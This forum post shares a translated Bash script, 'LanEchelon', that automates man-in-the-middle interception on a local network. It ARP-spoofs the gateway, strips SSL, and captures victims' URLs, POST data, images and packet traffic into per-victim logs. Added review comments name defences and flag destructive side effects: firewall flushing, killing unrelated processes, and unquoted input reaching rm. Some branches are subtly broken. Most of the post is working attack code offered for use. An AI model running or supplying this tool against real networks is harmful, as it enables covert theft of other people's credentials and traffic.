Hi all
I decided to translate my script LanEchelon (my native language is Polish) and post it here.
LanEchelon sniffs: traffic (saved as .pcap), URLs, images, POST data and SSL POST data.
Sorts the results in the logs.
It also has a host scanner.
Requirements:
Arpspoof - Package dsniff
SSLStrip
Driftnet
Ettercap
Tshark
ARP-Scan (old version in the repo, new - http://www.nta-monitor.com/tools/arp-scan/)
Maybe someone will like it.
Code:
#!/bin/bash
# LanEchelon 1.0 - interactive wrapper around arpspoof, sslstrip, urlsnarf,
# driftnet, ettercap and tshark. It prompts for a session name and options,
# rewrites the local firewall and forwarding state, starts the capture tools,
# and on exit sorts what was captured into files under /root/<session>/.
#
# Variables filled from the prompts (names are Polish):
#   SESJA   - session name, used as directory and file-name prefix
#   RUCH    - "yes"/"no": keep a full traffic capture
#   GRAFIKA - "yes"/"no": save images seen on the wire
#   ARP     - "yes"/"no": answer to the two-way ARP spoofing prompt
#   IFEJS   - network interface name
#   SKAN    - "yes"/"no": run the host listing first
#   NET     - "yes"/"no": whole network, or only the addresses in CEL
#   CEL     - space-separated list of IP addresses
# Variables filled by ipinfo: MOJEIP (own IP), MASKA (netmask), BRAMA (gateway).
#
# NOTE(review), host impact: the script writes to /root, /proc/sys and
# iptables, so it presumably runs as root. It flushes every iptables rule and
# chain on the machine (filter and nat) at start and at the end without saving
# the previous ruleset, sets ip_forward to 0 on exit regardless of its earlier
# value, and uses `killall` by process name (xterm, python), which also ends
# unrelated processes with those names.
# NOTE(review), input handling: every value read from the prompts is expanded
# unquoted into commands and paths (including `rm /root/$SESJA/*.cap`), so
# spaces, glob characters or path separators in the answers change what those
# commands act on.
# NOTE(review), defensive view: interception depends on ARP cache entries for
# the gateway being overwritten and on clients sending plain HTTP on tcp/80.
# Switch-level Dynamic ARP Inspection with DHCP snooping, ARP monitoring for
# gateway IP-to-MAC changes, and HSTS (including preload) on the web side
# address these two preconditions respectively.

# To do:

# Split the ettercap capture into one .pcap per address in CEL.
# When NET is "yes" nothing is split; the function only sleeps.
# When NET is "no", tshark reads /root/$SESJA/*.cap once per address, filtered
# on "ip.addr == <address>", and the original .cap files are then deleted.
function pcap {
  if [ $NET = "yes" ] ; then
    sleep 1
  elif [ $NET = "no" ] ; then
    for x in $CEL ; do
      tshark -r /root/$SESJA/*.cap -R "ip.addr == $x" -b filesize:92160 -w /root/$SESJA/$SESJA-$x.pcap
    done
    rm /root/$SESJA/*.cap
  fi
}

# Sort the urlsnarf output (/root/$SESJA/$SESJA.txt) into URL lists.
# NET "yes": one list with the lines matching MOJEIP removed.
# NET "no":  one list per address in CEL.
# The combined file is deleted afterwards in both cases.
function listaurl {
  if [ $NET = "yes" ] ; then
    grep -v $MOJEIP /root/$SESJA/$SESJA.txt > /root/$SESJA/$SESJA-url.txt
  elif [ $NET = "no" ] ; then
    for x in $CEL ; do
      grep $x /root/$SESJA/$SESJA.txt > /root/$SESJA/$SESJA-url-$x.txt
    done
  fi
  rm /root/$SESJA/$SESJA.txt
}

# List hosts on the local segment with arp-scan, drop the gateway line and the
# header/footer lines, keep the first four tab-separated fields, and store the
# result in /root/host.list. The list is printed when the `-s host.list` test
# succeeds, otherwise a "no active hosts" message is shown.
function skanhost {
  echo
  arp-scan -l -I $IFEJS | grep -v $BRAMA | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/&/g' | cut -f 1,2,3,4 > /root/host.list
  if [[ -s host.list ]] ; then
    echo -e "\e[01;33m[!]\e[00m List of active hosts \e[02;37m(IP,MAC,CARD MANUFACTURERJ)\e[00m:"
    echo
    echo ----------------------------------------------------------------------------
    echo -e "\e[1;32m`cat /root/host.list`\e[00m"
    echo ----------------------------------------------------------------------------
    echo
  else
    echo
    echo -e "\e[01;33m[!]\e[00m There are no active hosts..."
    echo
  fi
}

# Read the interface's own IP and netmask from `ifconfig` output (lines
# containing 'inet addr:' and 'Mask:') and the default gateway from the
# `route -n` line flagged UG for that interface, then print all three.
# Sets the globals MOJEIP, MASKA and BRAMA used by the rest of the script.
function ipinfo {
  MOJEIP=`ifconfig $IFEJS | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
  MASKA=`ifconfig $IFEJS | grep 'Mask:'| grep -v '127.0.0.1' | cut -d: -f4`
  BRAMA=`route -n | grep $IFEJS | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2`
  echo
  echo -e "\e[01;33m[!]\e[00m Data network interface \e[01;34m$IFEJS\e[00m:"
  echo
  echo -e "\e[02;35m GATEWAY: \e[00m$BRAMA"
  echo -e "\e[02;35m YOUR IP: \e[00m$MOJEIP"
  echo -e "\e[02;35m SUBNET MASK: \e[00m$MASKA"
  echo
}

# ---- Banner -----------------------------------------------------------------
clear
echo
echo ----------------------------------------------------------
echo -e "| @?$\e[01;38m>>>>>>>\e[00m}LanEchelon Script{\e[01;38m<<<<<<<\e[00m@?$ |"
echo ----------------------------------------------------------
echo -e "| \e[02;37msniff: traffic in .pcap, url, images, post, ssl post\e[00m |"
echo ----------------------------------------------------------
echo -e "| autor: \e[01;34mnum3r\e[00m version: \e[01;34m1.0\e[00m |"
echo ----------------------------------------------------------
echo
echo

# ---- Interactive configuration ----------------------------------------------
# None of the answers below is validated before it is used.
echo -e "\e[01;32m[+]\e[00m Starting procedure..."
echo
echo
echo -ne "\e[01;38m[>]\e[00m Please enter a name for the session: "
read -e SESJA
echo -ne "\e[01;34m[>]\e[00m Save the entire network traffic in .pcap?? (yes/no): "
read -e RUCH
echo -ne "\e[01;38m[>]\e[00m Save the captured images?? (yes/no): "
read -e GRAFIKA
echo -ne "\e[01;34m[>]\e[00m Enable option to two-way ARPspoofing?? (yes/no): "
read -e ARP
echo -ne "\e[01;38m[>]\e[00m Enter the name of the network interface, np. wlan0: "
read -e IFEJS
ipinfo
echo -ne "\e[01;34m[>]\e[00m Start scanning active hosts on the network?? (yes/no): "
read -e SKAN
if [ $SKAN = "yes" ] ; then
  skanhost
fi
# The line break inside the next prompt string is reproduced exactly as it
# appears on the page.
echo -ne "\e[01;38m[>]\e[00m Attack the whole network?? 
(tak/nie): "
read -e NET
if [ $NET = "yes" ] ; then
  sleep 1
else
  echo -ne "\e[01;34m[>]\e[00m Enter the IP address(-es) of the victim(-s) (separate space): "
  read -e CEL
fi
echo
echo

# ---- Setup ------------------------------------------------------------------
echo -e "\e[01;32m[+]\e[00m Starting attack...(press q to exit the script)"
sleep 2
echo
# The session directory is created with the default umask. It ends up holding
# captured URLs, POST data, images and packet captures as plain files, so it
# needs to be treated as sensitive material.
mkdir /root/$SESJA/
# Existing firewall state is discarded here; nothing in the script saves it.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# Turn this host into a router for the duration of the run.
echo "1" > /proc/sys/net/ipv4/ip_forward
sslstrip -p -f -k -w /root/$SESJA/$SESJA-ssl.log &
# Only tcp/80 is redirected to the local proxy port (10000). Connections that
# use HTTPS from the first request never match this rule, which is what HSTS
# and HSTS preload enforce on the client side.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 1
urlsnarf -i $IFEJS | grep http > /root/$SESJA/$SESJA.txt &
sleep 1
xterm -geometry 105x15+1+1 -bg black -fg green -T "SSL Log" -s -sb -si +sk -sl 5000 -e tail -f /root/$SESJA/$SESJA-ssl.log &
if [ $GRAFIKA = "yes" ] ; then
  mkdir /root/$SESJA/images/
  xterm -geometry 75x15+650+1 -bg black -fg blue -T "Images" -s -sb -si +sk -sl 5000 -e driftnet -i $IFEJS -p -a -d /root/$SESJA/images &
  sleep 1
else
  sleep 1
fi

# ---- ARP spoofing and capture -----------------------------------------------
# Network-visible effect of the arpspoof calls below: ARP replies that tie the
# gateway's IP ($BRAMA) to this host's MAC address. ARP monitoring tools and
# Dynamic ARP Inspection on managed switches are the controls that detect or
# drop such replies. ettercap runs in the foreground; the script continues
# past it when ettercap exits.
if [ $NET = "yes" ] && [ $RUCH = "yes" ]; then
  xterm -geometry 100x5+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS $BRAMA &
  sleep 1
  ettercap -T -q -u -z -i $IFEJS -w /root/$SESJA/$SESJA.cap -c -l /root/$SESJA/$SESJA
elif [ $NET = "yes" ] && [ $RUCH = "no" ]; then
  xterm -geometry 100x5+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS $BRAMA &
  sleep 1
  ettercap -T -q -u -z -i $IFEJS -c -l /root/$SESJA/$SESJA
fi
for x in $CEL ; do
  if [ $NET = "yes" ] && [ $ARP = "no" ]; then
    xterm -geometry 100x6+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS -t $x $BRAMA &
    sleep 1
    xterm -geometry 100x6+1+605 -bg black -fg yellow -T "ARPspoof 2" -e arpspoof -i $IFEJS -t $BRAMA $x &
    sleep 1
  elif [ $NET = "no" ] && [ $ARP = "no" ]; then
    xterm -geometry 100x6+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS -t $x $BRAMA &
    sleep 1
  fi
done
if [ $NET = "no" ] && [ $RUCH = "yes" ]; then
  ettercap -T -q -u -z -i $IFEJS -w /root/$SESJA/$SESJA.cap -c -l /root/$SESJA/$SESJA
elif [ $NET = "no" ] && [ $RUCH = "yes" ]; then
  ettercap -T -q -u -z -i $IFEJS -c -l /root/$SESJA/$SESJA
fi

# ---- Teardown ---------------------------------------------------------------
echo
echo -e "\e[01;32m[+]\e[00m Stopping attack..."
echo
# killall matches by process name, so every xterm and every python process on
# the machine is ended here, not only the ones this script started (python is
# presumably listed because sslstrip runs under it).
killall -q -w arpspoof
killall -q -w xterm
killall -q -w sslstrip
killall -q -w urlsnarf
killall -q driftnet
killall -q -w python
listaurl
if [ $RUCH = "yes" ] ; then
  pcap
else
  sleep 1
fi
rm /root/host.list
# The firewall is left empty and forwarding is forced off; the state that
# existed before the run is not restored.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "0" > /proc/sys/net/ipv4/ip_forward
echo
echo
echo -e "\e[01;32m[+]\e[00m Procedure completed..."
echo -e "\e[01;32m[+]\e[00m See you later..."
echo
exit
Best Regards


